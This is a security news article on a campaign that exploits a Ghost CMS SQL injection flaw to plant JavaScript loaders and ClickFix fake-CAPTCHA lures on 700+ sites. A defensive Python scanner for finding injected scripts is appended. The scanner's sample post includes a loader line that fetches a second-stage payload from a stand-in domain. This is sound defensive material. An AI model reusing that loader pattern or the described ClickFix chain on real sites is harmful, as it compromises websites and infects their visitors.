
Ghost CMS CVE-2026-26980 Exploited to Hijack 700+ Websites for ClickFix Attacks

Threat actors are exploiting a recently disclosed critical security flaw in Ghost CMS to inject malicious JavaScript code with the goal of fueling ClickFix attacks.

According to QiAnXin XLab, the activity involves the exploitation of CVE-2026-26980 (CVSS score: 9.4), an SQL injection vulnerability in Ghost's Content API that could allow an unauthenticated attacker to read arbitrary data from the database. The security flaw was addressed in February 2026 in version 6.19.1. The vulnerability was discovered by Anthropic using Claude.

What makes the vulnerability severe is that it allows an attacker to gain access to a site's admin API key without permission, granting them the ability to poison the site by injecting malicious code. The admin API key can be used to invoke the admin API and can directly modify articles published on the content management system.

The threat actor leveraged the security flaw to "obtain the target site's Admin API Key without authorization, and then used the Ghost Admin API to tamper with articles in bulk, injecting malicious JavaScript loaders at the bottom of the pages to support fake CAPTCHA attacks," XLab said.


The activity has been described by the Chinese security vendor as a "large-scale poisoning" campaign weaponizing the Ghost CMS flaw. At least two different threat clusters are assessed to be behind the campaign, in some cases implanting certain sites with malicious code within a single day. It was first detected on May 7, 2026.

In all, the campaign has compromised more than 700 websites, spanning universities, blockchain, artificial intelligence, software-as-a-service (SaaS), security research, media, and financial technology sectors. The fact that legitimate websites have been breached could further increase the success rate of the ClickFix attacks, XLab said.

The injected JavaScript code at the bottom of an article functions as a two-stage loader that is responsible for retrieving the main payload at runtime from an external domain ("clo4shara[.]xyz/11z77u3.php"). This architecture offers added flexibility because it allows the threat actor to swap out the payloads based on different criteria, while keeping the loader functionality intact across multiple compromised sites.

"Directly accessing clo4shara[.]xyz/11z77u3.php reveals a piece of code, which is actually a typical traffic distribution script," XLab explained. "Its core function is to collect various fingerprint information from the user's browser and upload it to the server, then perform actions such as redirection, popups, and downloads based on the returned instructions." The PHP script is powered by Adspect, a commercial cloaking service.


The idea behind using the cloaking script is to ensure that only real victims are served the actual payload, while security scanners and crawlers will only see a benign web page. The script also supports 19 different commands to run arbitrary JavaScript code and facilitate remote control of the victim's browser.

Site visitors deemed to be the intended targets are ultimately served a fake CAPTCHA verification page inside an iframe HTML element to prove they are human. This, in turn, triggers a ClickFix attack, as part of which they are instructed to copy and paste a Base64-encoded command into the Windows Run dialog.

The command serves as a dropper for delivering a ZIP archive, extracts from it a Windows batch script, and runs it. The script, for its part, executes a PowerShell command to download a DLL file from a remote domain, launch it using "rundll32.exe," and open a bogus web page to the user as a distraction.


Subsequent iterations of the malware have been found to replace the DLL with a JavaScript payload. Regardless of the type of the payload, the end goal of the attack is to drop a Windows executable. In the case of the DLL, the executable is a PuTTY client with a valid code-signing certificate. The binary distributed via JavaScript is an Inno Setup installer for an Electron application.

The application is a modified version of the open-source Grape desktop client that is designed to achieve persistence and poll a remote server ("web-telegram[.]ug") every 30 seconds to process instructions issued by the attacker, including running JavaScript code or executable files.

Ghost CMS users are advised to upgrade their instances to the latest version, rotate all credentials, clean up the sites, audit access logs for signs of suspicious activity, and notify users who may have visited the sites during the infection period about potential compromise.
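One way to carry out the "clean up the sites" step, as an added example that is not from the article, XLab or the Ghost project: scan each post's HTML for script tags that reference a host outside the site's own allowlist, and note whether the script sits at the bottom of the post, the placement reported for this campaign. The allowlist, the sample post and the stand-in loader domain are constructed assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical allowlist of the site's own hosts (assumption; use your own).
FIRST_PARTY_HOSTS = {"example.org", "cdn.example.org"}
URL_RE = re.compile(r"""https?://[^\s'"<>()]+""")

class _ScriptCollector(HTMLParser):
    """Collect every <script> tag: its src attribute, inline body and line."""
    def __init__(self):
        super().__init__()
        self.scripts, self._open = [], None
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._open = {"src": dict(attrs).get("src"), "body": "", "line": self.getpos()[0]}
    def handle_data(self, data):
        if self._open is not None:
            self._open["body"] += data
    def handle_endtag(self, tag):
        if tag == "script" and self._open is not None:
            self.scripts.append(self._open)
            self._open = None

def _hosts_in(script):
    """Hosts named by the script's src plus any absolute URL in its body."""
    urls = ([script["src"]] if script["src"] else []) + URL_RE.findall(script["body"])
    return {urlparse(u).hostname for u in urls if urlparse(u).hostname}

def find_injected_loaders(post_html, first_party=FIRST_PARTY_HOSTS):
    """Flag scripts that reference hosts outside the allowlist. 'at_bottom' marks
    the final script of the post, the placement reported for this campaign."""
    parser = _ScriptCollector()
    parser.feed(post_html)
    findings, total = [], len(parser.scripts)
    for i, s in enumerate(parser.scripts):
        foreign = sorted(h for h in _hosts_in(s) if h not in first_party)
        if foreign:
            findings.append({"line": s["line"], "hosts": foreign, "at_bottom": i == total - 1})
    return findings

# Constructed sample post: one legitimate first-party script, then an appended
# two-stage loader pulling its payload from a constructed stand-in domain.
SAMPLE_POST = """<p>Article body.</p>
<script src="https://cdn.example.org/analytics.js"></script>
<p>More text.</p>
<script>var s=document.createElement("script");s.src="https://loader.invalid/stage2.php";document.head.appendChild(s)</script>"""

if __name__ == "__main__":
    print(find_injected_loaders(SAMPLE_POST))
```

Run it against the HTML of every post pulled from your own Ghost instance; any finding with hosts you do not recognise is a candidate for removal, and the same scan repeated after cleanup confirms nothing was left behind.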
